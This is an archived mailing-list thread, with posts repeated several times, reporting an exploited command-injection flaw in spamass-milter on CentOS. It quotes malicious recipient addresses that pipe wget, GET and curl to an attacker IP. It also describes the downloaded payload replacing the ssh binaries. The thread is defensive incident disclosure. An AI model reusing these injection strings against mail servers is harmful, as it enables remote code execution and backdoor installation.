did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
removed the /xS directory.

6. It created an empty file name /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Paul Heinlein
2010-03-16 21:19:25 UTC
Permalink
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Permalink
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.

However I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
Paul Heinlein
2010-03-16 19:08:17 UTC
Permalink
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
removed the /xS directory.

6. It created an empty file name /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Paul Heinlein
2010-03-16 21:19:25 UTC
Permalink
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Permalink
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.

However I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
Paul Heinlein
2010-03-16 19:08:17 UTC
Permalink
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
removed the /xS directory.

6. It created an empty file name /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Paul Heinlein
2010-03-16 21:19:25 UTC
Permalink
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Permalink
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.

However I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
Loading...